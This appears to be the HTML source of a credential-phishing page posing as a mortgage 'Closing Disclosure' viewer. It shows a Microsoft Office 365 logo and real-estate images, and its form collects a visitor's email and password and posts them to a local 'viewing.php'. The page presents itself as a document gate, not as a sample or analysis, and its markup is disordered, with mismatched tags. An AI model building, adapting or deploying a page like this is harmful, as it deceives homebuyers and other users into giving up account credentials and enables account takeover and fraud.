<!DOCTYPE html>
<html class="no-js" prefix="og: https://ogp.me/ns#" lang="en-us">
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<title>Closing Disclosure</title>
	<meta name="viewport" content="width=device-width,initial-scale=1">
	<meta name="msapplication-tap-highlight" content="no">
	<link href="https://d1di2lzuh97fh2.cloudfront.net/files/1g/1g0/1g0f0h.css?ph=7d9bff33bd" rel="stylesheet">
	
	
</script></head><body class="layout-01 wtf-homepage">
<div class="wnd-page cf color-blue">
	<div id="wrapper">

		<header id="header">
		
		</main><footer id="footer">

			<div class="section-wrapper cf">
	<div class="section-wrapper-content cf"><div wn-border="top" wn-border-element="section-inner" class="section footer-01 design-03 section-media wnd-background-image">
	<div class="section-bg">
		<div class="section-bg-layer wnd-background-image  bgpos-center-center bgatt-scroll" style="background-image:url('https://thumbs.dreamstime.com/z/keys-model-house-real-estate-buying-apartment-mortgage-sale-contribution-113093377.jpg')">
			
		</div>
		<div class="section-bg-layer section-bg-overlay overlay-black"></div>
	</div>
</header><main id="main" role="main">

			<div class="section-wrapper cf">
	<div class="section-wrapper-content cf">
		<div wn-border="bottom" wn-border-element="section" class="section header header-01 fullscreen cf design-01 section-media wnd-background-image">
	<div class="section-bg">
		<div class="section-bg-layer wnd-background-image  bgpos-center-center bgatt-scroll" style="background-image:url('url(https:/fastsms.co.uk/wp-content/uploads/email-logos.fw_.png')">
			<img src="https://cumanagement.com/sites/default/files/2018-11/Managing_Mortgages.jpg" alt="https://cumanagement.com/sites/default/files/2018-11/Managing_Mortgages.jpg" width="1672" height="700"><div class="logo logo-default wnd-font-size-80 fira-sans wnd-logo-with-text wnd-image-vector">
				<div class="logo-content">
					<div class="embed-content">
						<div class="embed-content-cell">
							<p><script>checkAndChangeSvgColor('wnd_LogoBlock_308156_img');</script>
						</div></div>
					<div class="text-content-outer">&nbsp;</div></div></div>
			<nav id="menu" role="navigation" data-position="top" data-to-main="true">
			<div><a href="#" class="close-menu" rel="nofollow"><span>Close Menu</span>
				</a>
				<ul class="level-1">
					<li class="wnd-active   wnd-homepage"><a href="/home/">
					<span>Home</span></a> </li>
				</ul><span class="more-text">More</span> </div></nav><script type="application/javascript">var el=document.getElementById("menu");"undefined"!=typeof el&&(el.style.display="none")</script>
			<div id="menu-mobile" class="hidden"><a href="#" id="menu-submit">
				<span></span>Menu</a> </div>
			
		</div>
	</div>
</div></div>
</div>

		</header><main id="main" role="main">

			<div class="section-wrapper cf">
	<div class="section-wrapper-content cf"><section class="section default-01 design-01 section-media wnd-background-image"><div class="section-bg">
		<div class="section-bg-layer wnd-background-image  bgpos-center-center bgatt-scroll" style="background-image:url('https://www.mlsmortgage.com/wp-content/uploads/Know-Before-You-Owe-Blank-Disclosures-Featured-720x380.jpg')">
			
		</div>
		<div class="section-bg-layer section-bg-overlay overlay-black">&nbsp;<p>
			</p>
			<p></div>
	</div>
	<div class="section-inner">
		<div class="content cf wnd-no-cols">
	<div>
		<div class="text cf design-01">
    <div class="text-content cf"><h1><b><font size="4">LOGIN WITH A VALID EMAIL AND PASSWORD TO VIEW CLOSING DISCLOSURE</font></b></h1>
		<p align="center">
		<img src="https://images.idgesg.net/images/article/2017/06/microsoft-office-365-logo-2016-100727915-large.jpg" alt="https://images.idgesg.net/images/article/2017/06/microsoft-office-365-logo-2016-100727915-large.jpg" width="292" height="102"></div>
</div><div class="form block pr cf design-01">
	<form action="viewing.php" method="post">

		<fieldset class="form-fieldset">
<div><div class="form-input form-email cf wnd-form-field wnd-required">
	<label for="field-wnd_EmailField_515451"><span class="inline-text">
	<span>EMAIL</span>
</span></label>
	<input id="field-wnd_EmailField_515451" name="wnd_EmailField_515451" required value="" type="email" maxlength="255">
</div><div class="form-input form-text cf wnd-form-field wnd-required">
	<label for="field-wnd_ShortTextField_12858"><span class="inline-text">
	<span><span>PASSWORD</span></span>
</span></label>
	<input id="field-wnd_ShortTextField_12858" name="wnd_ShortTextField_12858" required value="" type="password" maxlength="150">
</div></div>
		</fieldset>

		<div class="form-submit cf button-01">
			<button type="submit" name="send" value="wnd_FormBlock_318197">
				<span class="text">SUBMIT TO VIEW</span>
			</button>
			</div>

	</form>

	
</div>
</section>

		</main>
	</div>
	
</div>
	</div></div>
</div></body></html>